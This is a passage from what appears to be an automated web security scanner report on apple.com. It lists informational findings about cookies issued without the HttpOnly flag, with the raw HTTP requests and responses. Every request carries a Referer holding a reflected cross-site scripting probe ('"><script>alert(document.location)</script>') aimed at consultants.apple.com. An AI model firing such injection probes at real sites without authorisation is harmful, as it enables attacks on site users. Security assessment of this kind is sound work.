Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Tue, 18 Nov 2008 01:42:58 GMT
If-None-Match: "864-45becd0a92c80"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Tue, 18 Nov 2008 01:42:58 GMT
ETag: "864-45becd0a92c80"
Cache-Control: max-age=447
Expires: Tue, 19 Jul 2011 18:58:07 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=yset3HlqlXXedErdrhfwFqlK7fPqM3ABNKuAZC58cwdxh7SdMXx+EqpxTqphBovEWPqGrq17zqIGw0tCohwrnSxToTuKbnQnGgu3T9eIk+BT7aZVOK79Rpk7FQFNJ0OgNxj5/KTmw/1CDlXKxb88sPBWbL4TfCoMwRDqTEo273pvf+WKVsLRU9JkU0K9BDODHX+dvYrIR8iTFrcccwdGqkJV3euxF1RsybNzNGSiYrfcYKlfu8h2lY8LYmGHY2b20GywOs70THudYHDvIf6JziCzOJTf/F1be8SGBq14vEBmUGGd9t62bmSQUHh++p+1Phub0kwrIUTCr7+7szmbQVYAVMI0u0LFe3rtUmSKwoW2M1zS/2zk6/pzwCUd7+yBmf+0f88i26KxzaHE1c4uxN5cQf/s1/PFJU/Zii3Qp9OjxltvMY3MngUN4ZXYCdrqWeV7+msCzSToLtJPlDDoDgkaPUj4vNfMd3s3Td67C9yEXKxbLkDTalMdHl5EWpw0uW0OZOs3T2djrXkhCZ8xwwGUy8+tHLRzOFWbcgrq1UHNsiHE36xYCxJv/epLnHSY; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


14.65. http://images.apple.com/global/scripts/lib/event_mixins.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/lib/event_mixins.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/lib/event_mixins.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Fri, 11 Jul 2008 11:54:18 GMT
If-None-Match: "1fc2-451be3396ce80"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Fri, 11 Jul 2008 11:54:18 GMT
ETag: "1fc2-451be3396ce80"
Cache-Control: max-age=345
Expires: Tue, 19 Jul 2011 18:56:25 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=sBVN3TbalgB5E4m7E2xJmh0tmzDg2x54HfrzCe1cTPY/JCCdkEWUzjsmaMQ+M+20mvHYnyoNpkw/0GE+0PvYuDoDWuxsH+O1SX7ECNzZCPm+y3dS3i/+9OXsY1OnxfDzuDZK8QHdTyJFaUXXMMF6x5TlnphpmdnubPhpBm5ifixOdVBey0Iu322OO4vxLb4/mkNtVxBpebhlf1AFNnfUVoQGmzco212M5bUx68c5kVY/rO4FXA8Sw14poHM86i3S+0T8rkrHw68Nbi/R9JRHGuNDvreVVKff3A7A3CFjHzY9nTGS19mlXN0xoWF4grvxy+fG84px5BkF5ZsGz4ZGDc/6Ozi7MiWdA6dLP4DNSVxtKK1aV4tk5v/eHC1ThR4yBjGjQVwhBbsxdhErZ960BpYWHkPzQoLSnGp4/blKB5yhJAfvpDqw15ZTt7E4YUS0cA1nqyyl+NXX17fxrkuYu6tl01HkGv4cY0LoiO+iMYbjZVt7ZuOzSFuStNQSR67hb/fOAgJ5XkzMcyCaQi3Dq+ECqimj/QsOc4882PVjSLDy777hpnD72Tft8IAxZBU9; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


14.66. http://images.apple.com/global/scripts/lib/prototype.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/lib/prototype.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/lib/prototype.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Thu, 31 Mar 2011 00:21:09 GMT
If-None-Match: "27df1-49fbc451c6740"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 31 Mar 2011 00:21:09 GMT
ETag: "27df1-49fbc451c6740"
Cache-Control: max-age=462
Expires: Tue, 19 Jul 2011 18:58:22 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=hMyCmLF+YsroMeGIo0mEk3STgu7UYkNoKxupEtmb3LVs/Fn3urFJcVbv7h5V+5y0Go9jUjbAhCUQ9eExHixVAfNzygpZjF1oc3AG0bubbEVlPzjVH6Adnne50hBhYnVY9bZbpB+/BN5tt+aN7AazSN0+OMySApYdn0gDrEmFqaXR7CFdWG/FgcDPEEfAcovhD7EYb6D+nYw/aW1VIKmc53GWjLK9LHxCIQbpHoIHnqY4JJoKVL8itd8BSK42z4SOwOTXZhOcNVrntM/inbSztqwO0DVmWnKDMM/P4GrjUwbdmfh3d/7434snspLKsSy3FAHLQ3NH4kYba/1JwYTThA07i6rPYxcaOuoAQN7kfMei6SBfLUHAtIbkoMNi696fSbk/GqR7U3i6gC+iOamYT/NaUQFqPSKEtx4XAXdjAh8VvFS+dZ59yR/yoyMgrds8layxUG/JSESb1MvvrdU8UIEkn4FNus6vUMHl1vzz8f8SOTEo2OMAabczdG6gKhOiVOqFgVoGAqNLsFQdbzB4zy0FSnREg2NSPZkV0Mb6Z+vBtS+2Gzqbtw44WG/1OnJc; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


14.67. http://images.apple.com/global/scripts/lib/scriptaculous.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/lib/scriptaculous.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/lib/scriptaculous.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Tue, 13 May 2008 05:05:45 GMT
If-None-Match: "1cf46-44d159ddcfc40"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Tue, 13 May 2008 05:05:45 GMT
ETag: "1cf46-44d159ddcfc40"
Cache-Control: max-age=403
Expires: Tue, 19 Jul 2011 18:57:23 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=b0z9opXdW37drfDfyMKib4xNpnFpP9m+gj5KUJnAOz3PjFPvhXjCszkAFvAFuV/gcgrqMXyNcPXYm95N2qr1UA5Beq2Qg2/fBWvUJxn/PLs4urDm8oDEz0V9Vjw9u9T0sAWm5dM9Ife+3gnHwmLNx6rmZhDdUjitHJzOfKSsbkWqjY5QiiryzykhI0Cp5hiplk03WNr93Gvm00fJ68CJQgx3oxnz+Tcvt8xxRGc4hPpQRIwvoS9YCmRCFkjFLu+iZCdBfosP+ezysYfkB0WF0SoYwu6lT6T47vNuyZJQQGZvjgTYbia5ACFHDi1emMISu8eEO9JKoafuPu+/EP1ozm5XmArYvYTWZLXVQEWyDrgGITPxRTOsRYja56nXmRVzIUtsVwx+nTB7DT0pKu5F2jmIGM5geNmpd+w1mH9vKeSqK/3clVku0EA2pTtjPkoTSs4aSWVNQZrG4sOb6yqgaxl4+cpYNXhZSxOr34gBYV2XHdvBlA0dpS5XLgy6HbDpNp/Ny5K9K3isKGHjCuQvDEyPsCXOrWLHmtJn79hNa1i5wEkPBAYbYOLjQmrlA+ga; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


14.68. http://images.apple.com/global/scripts/overlay_panel.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/overlay_panel.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/overlay_panel.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Wed, 30 Mar 2011 22:24:08 GMT
If-None-Match: "2be4-49fbaa2a07200"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Wed, 30 Mar 2011 22:24:08 GMT
ETag: "2be4-49fbaa2a07200"
Cache-Control: max-age=459
Expires: Tue, 19 Jul 2011 18:58:19 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=YTXNJI3FCQgB8dxsD7AqY057PByO/l2zbgH2wFRDrum3Ig6uCv0TBq2YpQf7se3WXtxZIAuMgq2gqgzWOIWTaNykftxf5IuPXpHcSkePmbVV+WxpHpMfEQ63QCxuF/gYS66T0bwSMAKw72SU24T0S3/O3qpnD/mmKl7Djfib8oqwY+QyAUn2FVU1LLelD8bHgt+60axQ6wI9FSa+KYIwnLpx4+xeWRCtXubNAG9x/mLbJ/s0EEyJeqrb2Q0pB6/wfaIXuCRTZZNxgx/LBjRvOtP8/oWh6RWWi1Td+4SJRN+LroThUN8oONNoPYNkLPBhxbcm7HKbIkaiccBRGdO8lUPZjKAbR0UdHCjCFYFNTD2+qZGMw3rQ9FN08c7dTDK/V1ppOWGYffKVJmx2tQJA6hS+SsKZ9tgXMThwD4teMLUnpzpJ6Ba6h+xt0pOR8ptOaucyf2mlsCzSuyu3DvQMHTKxLaaetcHng+vBxmvEmfV5kJzIxGA/XSsoHS8LcT3UEEK2nlhphXHvP3Zp69rkoEX3DHA9ArlKEwfvB/dCK4doNvsHYUK3nb20cjYge1zw; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


14.69. http://images.apple.com/global/scripts/search_decorator.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/search_decorator.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/search_decorator.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Thu, 07 Apr 2011 22:41:13 GMT
If-None-Match: "230-4a05bce73b440"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 07 Apr 2011 22:41:13 GMT
ETag: "230-4a05bce73b440"
Cache-Control: max-age=369
Expires: Tue, 19 Jul 2011 18:56:49 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=LEJBEBcQgxjRsTTCyAyYKhmrQ29mZ0tWZB2LLEvwBvmGhUolex0IKN0tkOfWn0IRDQecZ7oWhs+BcY4jVyGVZNnMltnMRgtSDqGLLt0A4dQCM2dk3XSM93IAotSYgDtChyr6vB5EnIx9I8BGt1w+NV02BAMXRHFAU5KKQ4pDq9PYwMmpFhrmYVnkmPEB2wSd7jOCQIIo8SG+3fCB93TKfTnFPl9XC3aBtShw+7JTPold2YkZobB1eP4vaaNyiXG4r+vGIDmVsy3H0bmCQBzD3QOMbB69nwIgfE4xTPT3Muku37mGY1aulIO/b39sugY/NrWIYfVq+MAcTRJri8mruMiZnOozdqngIcCl/rtx2fq/XcoYRslIgp8Oalavojqcq18SDeyDaBRoC8ECx0aoKp9VOnMeqA2aWHzunbVZ/SUNoqg02qeRYmaNIbv/S56XrUylAt3mdz56r9MHZeDu/qMb98o3CXzRVtubBHxcbZ33NfYY2HWiZqpqNM2T45275YqvYQu325MjTG59ZL2p346RvTxqFT3xE0jLl2080M5vX04ea4TN8q2cR1qNhiJR; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


14.70. http://images.apple.com/global/scripts/swap_view.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/swap_view.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/swap_view.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Sun, 05 Jun 2011 18:21:01 GMT
If-None-Match: "101b4-4a4fb0c8a9d40"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Sun, 05 Jun 2011 18:21:01 GMT
ETag: "101b4-4a4fb0c8a9d40"
Cache-Control: max-age=383
Expires: Tue, 19 Jul 2011 18:57:03 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=DgFhV0K9vbrLvIKQ/ohaOrDgNrbgYzv038niR20mFJ1TeNIhlRS9Akj+VtmF8/YQWH6+TNwMCIJ/xwlSCj/VZ1QqQKKs+9YCHrWJbbBxrMcbKZzNJ/6jo0ef9WBeJMnKqyGXCTM6W6zU3KzNsKGRem5F2gKN8NiYS0vlDCU9abaven2AVH4YHwSKZoN5M5nOz/bvqYPvJoLLAI5KMFCwoFqjO92pnNnaIVTmO+nRpkl9Xy7SRXKDz9LDw58cFhuIMCrfK3GMHYIxv/NVeZZVIp+cdFy0jBUg25LC58XbP7o3ZpULlNf/iTECsydJmsrkK8DRdnjNm797Ts5WfBSHzvqYysZ1ZSU0a77CxWOTy64eM9Nwh714ihKnzZQi/Bp0B+7uUCcfswE3pgUVYGBSSrSE+QqssPiwzB2j51Q7637zezmWRBhG4gQ1z+7+AzsneClCGUjhtzwzW9clgcVnAUXCKluCDdrjw0eHDKx/fJNE65vLnnXUju0pk98x8W6EeXy/Lb42sLCsZAyYODkBTD1j33V98NyncjXmtB6rQnQWxLPfoSpKcTY+knm4sbyP; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


14.71. http://images.apple.com/global/scripts/view_master_tracker.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/view_master_tracker.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/view_master_tracker.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; 